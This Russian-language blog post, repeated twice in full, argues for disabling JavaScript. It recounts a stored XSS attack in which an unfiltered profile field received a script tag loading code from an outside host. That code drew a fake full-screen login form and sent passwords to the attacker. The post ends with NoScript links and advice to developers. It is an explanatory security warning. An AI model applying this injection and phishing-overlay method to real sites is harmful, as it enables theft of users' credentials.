![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
natarajВот в предыдущем посте некоторые сказали что-то вроде "зачем отключать JavaScript, если я на адресную строку в браузере каждый раз смотрю, прежде чем вводить пароль".
А вот зачем
Краткий пересказ: В одном весьма популярном сайте на ранних этапах его становления была допущена совсем мелкая ошибка. Они к стандартным параметрам пользователя, которые были в используемом движке, добавили еще один свой, диктуемый предметной областью сайта, и стали выводить его вместе с другой юзерской информацией в каждом посте и комментарии. Нюанс в том, что информация из базы данных попадала в браузер без какой-то фильтрации, и если в это поле запихнуть html-тег то в бразуер будет попадать как html-тег. Вроде бы не особо страшно... Но теперь следите за руками:
В оное поле запихиваем <script src="http://tsq.od"></script>, по оному адресу отдаем файл с ява-скриптом, который создает новый <div>перекрывающий весь экран, рисует на нем форму ввода пароля полностью совпадающую с той, которая есть на сайте, но только результат введенный в эту форму отправляется на сайт злоумышленника. Ну и для полного счастья, этот скрипт ставит куку, чтобы одному и тому же пользователю этот фальшивый экран не показывался бы дважды. Далее пишем в несколько популярных тем комментарий от имени пользователя с троянским кастомным полем и ждем.
Итого юные исследователи насобирали несколько сотен паролей, среди которых оказались пароли пользователей с полным админским доступом...
Отдельно прошу отметить: в адресной строке браузера показывался правильный адрес.
Выводы:
1. Если вы хотите повысить уровень безопасности работы с каким-либо сайтом (например вы в нем супер-модератор или админ) -- отключайте для этого сайта скрипты.
2. Если вы разработчик сайта -- не поленитесь, приложите усилия для того, чтобы ваша разработка была достаточно юзабельна с выключенным JavaScript. Чтобы те, кто заботится о своей безопасности, могли бы это сделать. В любом коде есть баги. Отключение JavaScript делает эксплуатацию части из них невозможной... Оно того стоит.
И опять ссылки:
NotScript для Хрома: https://chrome.google.com/webstore/detail/notscripts/odjhifogjcknibkahlpidmdajjpkkcfn
NoScript для FireFox'а: https://addons.mozilla.org/ru/firefox/addon/noscript/
А вот зачем
Краткий пересказ: В одном весьма популярном сайте на ранних этапах его становления была допущена совсем мелкая ошибка. Они к стандартным параметрам пользователя, которые были в используемом движке, добавили еще один свой, диктуемый предметной областью сайта, и стали выводить его вместе с другой юзерской информацией в каждом посте и комментарии. Нюанс в том, что информация из базы данных попадала в браузер без какой-то фильтрации, и если в это поле запихнуть html-тег то в бразуер будет попадать как html-тег. Вроде бы не особо страшно... Но теперь следите за руками:
В оное поле запихиваем <script src="http://tsq.od"></script>, по оному адресу отдаем файл с ява-скриптом, который создает новый <div>перекрывающий весь экран, рисует на нем форму ввода пароля полностью совпадающую с той, которая есть на сайте, но только результат введенный в эту форму отправляется на сайт злоумышленника. Ну и для полного счастья, этот скрипт ставит куку, чтобы одному и тому же пользователю этот фальшивый экран не показывался бы дважды. Далее пишем в несколько популярных тем комментарий от имени пользователя с троянским кастомным полем и ждем.
Итого юные исследователи насобирали несколько сотен паролей, среди которых оказались пароли пользователей с полным админским доступом...
Отдельно прошу отметить: в адресной строке браузера показывался правильный адрес.
Выводы:
1. Если вы хотите повысить уровень безопасности работы с каким-либо сайтом (например вы в нем супер-модератор или админ) -- отключайте для этого сайта скрипты.
2. Если вы разработчик сайта -- не поленитесь, приложите усилия для того, чтобы ваша разработка была достаточно юзабельна с выключенным JavaScript. Чтобы те, кто заботится о своей безопасности, могли бы это сделать. В любом коде есть баги. Отключение JavaScript делает эксплуатацию части из них невозможной... Оно того стоит.
И опять ссылки:
NotScript для Хрома: https://chrome.google.com/webstore/detail/notscripts/odjhifogjcknibkahlpidmdajjpkkcfn
NoScript для FireFox'а: https://addons.mozilla.org/ru/firefox/addon/noscript/